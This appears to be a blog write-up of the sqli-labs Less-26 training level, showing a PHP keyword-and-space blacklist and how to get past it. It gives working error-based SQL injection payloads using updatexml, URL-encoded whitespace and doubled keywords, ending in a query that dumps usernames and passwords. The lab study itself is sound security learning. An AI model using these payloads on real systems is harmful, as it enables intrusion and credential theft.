当前位置:网站首页>SQL injection less26 (filter spaces and comments, and use error injection without spaces)
SQL injection less26 (filter spaces and comments, and use error injection without spaces)
2022-07-26 22:17:00 【Happy star】
function blacklist($id)
{
$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/and/i',"", $id); //Strip out AND (non case sensitive)
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --
$id= preg_replace('/[#]/',"", $id); //Strip out #
$id= preg_replace('/[\s]/',"", $id); //Strip out spaces
$id= preg_replace('/[\/\\\\]/',"", $id); //Strip out slashes
return $id;
}
Try to bypass spaces
Replace blank space :
(1)mysql Blank character :%09、%0A、%0B、%0D、%20、%0C、%A0、/**/
(2) Regular whitespace :%09、%0A、%0B、%0D、%20
25% Is a percent sign ,%25A0 It's a blank character
%09——TAB key ( level )
%0a—— Create a new line
%0c—— A new page
%0d return function
%0b——TAB key ( vertical )
%a0—— Space
Inline comments are often used to bypass spaces
I tried , Found that you can't bypass the space
because Windows You cannot use some special characters to replace spaces ,Linux Sure , You can go to Linux Next try
Injection method without spaces ( An error injection )
?id=1'||updatexml(1,concat(0x7e,(database())),1)||'1' ='1?id=1'%26%26updatexml(1,concat('~~',database()),1)%26%26'
%26 yes & Of url code .
because and There must be a space before and after , So use &&
however && It cannot be submitted to the server normally , So we have to input his url code %26%26 Talent .
use || It's fine too , Better to use
?id=1'%26%26updatexml(1,concat('~~',database()),1)%26%26'
?id=1'%26%26updatexml(1,concat('~~',(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema="security"))),1)%26%26'
Notice that the statement is wrapped in parentheses , Around the space
Parenthesis () Separate the parts of each query 
?id=1'%26%26updatexml(1,concat("~~",(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema="security"%26%26table_name="users")),0)%26%26'
near 'LIMIT 0,1'
This problem , Error injection has also occurred before , There may be more Limit 0,1 As a result, the whole statement cannot be formed
It could also be here (table_schema="security"%26%26table_name="users") There is a problem
?id=1'%26%26updatexml(1,concat("~~",(select(group_concat(username,passwoorrd))from(users))),0)%26%26'
https://blog.csdn.net/weixin_43901998/article/details/107340272
https://blog.csdn.net/weixin_43901998/article/details/107340272
边栏推荐
- unity 获取网络时间
- 09.01 深度优先搜索
- Join method in JS
- 新兴市场潜力无限,ADVANCE.AI风控产品助中国出海企业筑牢安全发展基础
- Matlab draws short-term average amplitude spectrum
- EasyUI DataGrid obtains multiple selected data for operation
- Excel-vba quick start (X. prompt box, inputable pop-up box)
- [waiting and wakeup of QT multithreaded threads]
- Task04 | classification analysis
- JS 延迟执行window.onload
猜你喜欢
![[tool] apifox](/img/a8/73325ec02a8bed2db2a8168f5bd40e.png)
随机推荐
一篇让小百彻底搞懂性能调优
What you need to know about mobile video compatibility
Pytoch -- used by visdom
梦里的一碗面
Vb.net chart1 processing
Excel-vba quick start (XI. Common string operations)
Try new functions | decrypt Doris complex data type array
SQL注入 Less26(过滤空格和注释符,使用不带空格的报错注入)
自己学习Cesium的笔记简介
Add resource files for the project and pictures for buttons in QT
day07-
【Qt多线程之线程的等待和唤醒】
08.02 adjacency table
yolov1
Triangular wave spectrum of MATLAB excitation model
Just one dependency to give swagger a new skin, which is simple and cool~
matlab 基音周期估计后处理
寻找数字零售的发展新方向,才是保证数字零售可以进入到全新发展阶段的关键
xshell7个人免费下载,使用
d和c的符区别